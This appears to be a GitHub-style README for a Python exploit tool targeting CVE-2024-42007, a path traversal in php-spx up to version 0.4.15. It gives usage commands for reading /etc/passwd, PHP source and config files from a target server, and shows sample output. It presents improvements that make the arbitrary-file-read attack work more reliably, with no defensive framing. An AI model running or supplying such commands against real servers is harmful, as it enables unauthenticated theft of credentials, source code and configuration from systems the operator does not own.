CVE-2024-42007 - php-spx Path Traversal Exploit

Python 3 proof-of-concept for CVE-2024-42007 with actual usability improvements.

Vulnerability Summary:

php-spx <= 0.4.15 suffers from a path traversal vulnerability via the SPX_UI_URI parameter, allowing unauthenticated attackers to read arbitrary files from the server.

What's different here

The original PoC had a hardcoded detection string (root:x:0:0:root) that only worked for /etc/passwd. If you tried reading PHP files or anything else, it would fail even when the exploit worked.

This version fixes that:

• Removed the detection string requirement - prints output directly
• Added -k parameter for SPX_KEY (defaults to dev)
• Detects HTML error pages and shows proper error messages
• Actually works for reading PHP files, configs, etc.

Usage

Basic:

python3 spx.py -t http://192.168.1.100/index.php/ -f /etc/passwd

With custom SPX_KEY:

python3 spx.py -t http://192.168.1.100/index.php/ -f /var/www/html/config.php -k a2a90ca2f9f0ea04d267b16fb8e63800

Parameters

-t, --target    Target URL (required)
-f, --file      File to read (default: /etc/passwd)
-k, --key       SPX_KEY value (default: dev)

Example

# This actually works now
$ python3 spx.py -t http://target/index.php/ -f /var/www/html/index.php -k mykey
<?php
require_once 'config.php';
// ... rest of file contents

# Wrong key? You'll know
$ python3 spx.py -t http://target/index.php/ -f /etc/passwd
[-] Failed to read file. Got HTML response - incorrect SPX_KEY or file doesn't exist

Credits

Based on the original PoC by BubblyCola.